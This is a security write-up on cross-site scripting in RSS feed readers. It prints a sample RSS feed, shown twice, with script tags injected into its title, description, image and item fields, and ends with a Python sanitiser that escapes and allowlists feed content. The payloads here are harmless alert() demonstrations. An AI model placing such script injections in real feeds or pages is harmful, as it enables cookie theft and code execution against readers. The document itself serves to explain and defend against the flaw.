VULNERABILITY
Browsers, local readers, Web sites, and online portals such as Bloglines, Google Reader, and Rojo all subscribe to feeds. More advanced methods of aggregating feeds are provided by AJAX coding techniques and XML components known as Web widgets. Ranging from full-fledged applications to small fragments of code that can be integrated into larger programs, they allow users to aggregate OPML files, email services, documents, or feeds into a single interface. Many customizable homepage/portal implementations such as iGoogle, Live.com, My Yahoo!, and Pageflakes provide such functionality.
Even though data delivered by RSS feeds originates remotely, many clients display it as if it were trusted local data. The RSS Specification states that story bodies (the tag) allow HTML entities so that HTML formatting can be carried in entity-encoded form, but it is not clear about the inclusion of literal HTML tags. Research of several web feed readers reveals different approaches to treating feed input and passing content on to users. This is the area in which the root cause of the attack possibilities can be analyzed.
Problem 1: Problem With Feed Reader Client Applications
Many of the popular feed reading applications are vulnerable because their developers failed to add security checks when interpreting feed content, which may allow JavaScript code to be executed on the client computer. The example given below shows script injection at multiple points in a single feed.
<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="http://www.my-blog.com/styles/mystyle.css" type="text/css"?>
<rss version="2.0">
  <channel>
    <title><script>alert('Title')</script></title>
    <link>http://www.my-blog.com/</link>
    <description><script>alert('Description')</script></description>
    <language>en-us</language>
    <copyright>SECURi</copyright>
    <pubDate>Thu, 25 OCT 2007 09:20:43 IST</pubDate>
    <ttl>10</ttl>
    <image>
      <title><script>alert('ImageTitle')</script></title>
      <link>http://www.my-blog.com/</link>
      <url>http://www.my-blog.com/mylogo.gif</url>
      <width>180</width>
      <height>50</height>
      <description><script>alert('ImageDescription')</script></description>
    </image>
    <item>
      <title><script>alert('ItemTitle')</script></title>
      <link>http://www.my-blog.com/events.html</link>
      <description><script>alert('ItemDescription')</script></description>
      <pubDate>Thu, 25 OCT 2007 09:20:43 IST</pubDate>
    </item>
  </channel>
</rss>
This flaw may be used for a wide variety of malicious purposes, ranging from installing malicious software on a client system to stealing cookies. Attackers can exploit the vulnerability by setting up a malicious blog or web feed and enticing a user to subscribe to the RSS feed, or by adding malicious JavaScript to the comments section of a trusted blog. We discuss more such risks in the "Impact" section later in this document.
The problem is centered on how the feed's XML content is parsed. Aggregators pass < and > through as literal HTML markup [Literals: any notation for representing a value within programming language source code] and thus execute any script contained in the feed, which in this case is JavaScript.
Problem 2: Problem With Web Based Feed Reading Services
Web application developers often implement the standard XML specification for their web based feed reader application. A web based reader converts HTML entities to their real values. When this converted data is displayed to the user there is a potential risk of script injection: attackers could send malicious code to mailing lists that offer RSS or Atom feeds and trick users.
The following example shows an RSS 2.0 feed.
<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="http://www.my-blog.com/styles/mystyle.css" type="text/css"?>
<rss version="2.0">
  <channel>
    <title><script>alert('Title')</script></title>
    <link>http://www.my-blog.com/</link>
    <description><script>alert('Description')</script></description>
    <language>en-us</language>
    <copyright>SECURi</copyright>
    <pubDate>Thu, 25 OCT 2007 09:20:43 IST</pubDate>
    <ttl>10</ttl>
    <image>
      <title><script>alert('ImageTitle')</script></title>
      <link>http://www.my-blog.com/</link>
      <url>http://www.my-blog.com/mylogo.gif</url>
      <width>180</width>
      <height>50</height>
      <description><script>alert('ImageDescription')</script></description>
    </image>
    <item>
      <title><script>alert('ItemTitle')</script></title>
      <link>http://www.my-blog.com/events.html</link>
      <description><script>alert('ItemDescription')</script></description>
      <pubDate>Thu, 25 OCT 2007 09:20:43 IST</pubDate>
    </item>
  </channel>
</rss>
There is a serious risk involved when reader applications [typically browser components] convert &lt; to < and &gt; to > before rendering, allowing script execution.
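A defensive rendering path that covers both problems above, as an added example that is not code from the original paper or from any of the readers it names: the feed is parsed with a real XML parser, titles are treated as plain text and escaped, and descriptions (which RSS allows to carry entity-encoded HTML) pass through a tag allowlist that drops script bodies and all attributes. The sample feed, the allowlist and the function names are constructed for illustration.

```python
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed feed (not from the paper): item 1 has literal <script> child elements
# (Problem 1); item 2 has entity-encoded ones that a reader decodes (Problem 2).
SAMPLE_FEED = """<rss version="2.0"><channel><title>Constructed feed</title>
<item><title>Literal <script>alert(1)</script> title</title>
<description>Hello <script>alert(2)</script>world</description></item>
<item><title>Encoded &lt;script&gt;alert(3)&lt;/script&gt; title</title>
<description>&lt;b&gt;bold&lt;/b&gt; text&lt;script&gt;alert(4)&lt;/script&gt;&lt;img src=x onerror=alert(5)&gt;</description></item>
</channel></rss>"""

ALLOWED_TAGS = {"b", "i", "em", "strong", "p"}  # formatting only; attributes are never kept

class AllowlistSanitizer(HTMLParser):
    """Keep allowlisted tags (without attributes), drop script/style bodies, escape the rest."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1                       # everything up to the matching end tag is dropped
        elif tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")          # attrs (onclick, onerror, ...) are discarded
    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data))   # text is re-escaped, never emitted raw

def sanitize_html(fragment):
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)

def inner_markup(elem):
    """Element text plus any literal child elements serialised back to markup (Problem 1)."""
    return (elem.text or "") + "".join(ET.tostring(c, encoding="unicode") for c in elem)

def render_feed(xml_text):
    """Safe HTML for every title (plain text, so escaped) and every description (sanitised)."""
    root = ET.fromstring(xml_text)
    return {"titles": [html.escape(inner_markup(e)) for e in root.iter("title")],
            "descriptions": [sanitize_html(inner_markup(e)) for e in root.iter("description")]}
```

Titles come back with any tags displayed as text, and descriptions keep only the allowlisted formatting tags, so neither injection path reaches the browser as executable markup.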